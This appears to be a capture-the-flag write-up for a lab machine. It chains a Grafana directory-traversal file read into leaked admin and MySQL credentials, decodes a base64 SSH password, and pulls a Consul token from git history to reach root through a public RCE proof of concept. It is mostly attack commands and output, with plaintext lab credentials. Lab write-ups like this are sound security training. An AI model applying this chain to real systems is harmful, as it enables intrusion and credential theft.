$ nmap -p- --min-rate 5000 10.129.228.56
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 05:49 EDT
Nmap scan report for 10.129.228.56
Host is up (0.015s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
3306/tcp open mysql
Port 80
The only interesting thing here is the mentioning of the user developer:
Other than that, there was not much here.
Grafana LFI -> Creds
Port 3000 was hosting a Grafana instance.
This version of Grafana is vulnerable to public exploits:
$ searchsploit grafana
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Grafana 7.0.1 - Denial of Service (PoC) | linux/dos/48638.sh
Grafana 8.3.0 - Directory Traversal and Arbitrary File Rea | multiple/webapps/50581.py
----------------------------------------------------------- ---------------------------------
We can confirm that this works:
Grafana stores a configuration file at /etc/grafana/grafana.ini, so let's start there. We can find some passwords within that:
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427
With this, we can login to the admin panel:
Within the configuration files, we can find a mysql.yaml file.
We can't edit it, and there wasn't any credentials in it:
However, maybe we can use the LFI to read this file on the machine itself.
Based on this documentation, it is located in/etc/grafana/provisioning/datasources.
Using these creds, we can login to the MySQL database on the machine:
$ mysql -u grafana -h 10.129.228.56 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
Then, we can use the whackywidget database to find the password for developer.
MySQL [whackywidget]> select * from users\g
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
$ echo YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== | base64 -d
anEnglishManInNewYork027468
We can then login as developer via ssh using this password.
Privilege Escalation
Consul Token -> RCE
I was wondering where that whackywidget dataabse came from and why it had the password for the user instead of the grafana database. Within the /opt directory, we can find some additional folders:
developer@ambassador:/opt$ ll
total 16
drwxr-xr-x 4 root root 4096 Sep 1 2022 ./
drwxr-xr-x 20 root root 4096 Sep 15 2022 ../
drwxr-xr-x 4 consul consul 4096 Mar 13 2022 consul/
drwxrwxr-x 5 root root 4096 Mar 13 2022 my-app/
developer@ambassador:/opt/my-app$ ls
env whackywidget
consul is an application used to configure and spin up applications with databases:
The application on the machine starts on port 8500, and we can also find out the version running:
developer@ambassador:/opt/my-app/env$ netstat -tulon
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8300 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8301 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8302 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8500 0.0.0.0:* LISTEN off (0.00/0/0)
developer@ambassador:/opt/my-app/env$ consul --version
Consul v1.13.2
There are some exploits for this:
However, we first need to find the token within the files. Within the /opt/my-app directory, there's a .git repository.
developer@ambassador:/opt/my-app$ ls -la
total 24
drwxrwxr-x 5 root root 4096 Mar 13 2022 .
drwxr-xr-x 4 root root 4096 Sep 1 2022 ..
drwxrwxr-x 4 root root 4096 Mar 13 2022 env
drwxrwxr-x 8 root root 4096 Mar 14 2022 .git
-rw-rw-r-- 1 root root 1838 Mar 13 2022 .gitignore
drwxrwxr-x 3 root root 4096 Mar 13 2022 whackywidget
If we check the logs, we can find the token:
developer@ambassador:/opt/my-app$ git log -p -2
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 23:47:36 2022 +0000
tidy config script
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
# We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
Afterwards, just run the PoC above on the machine itself.
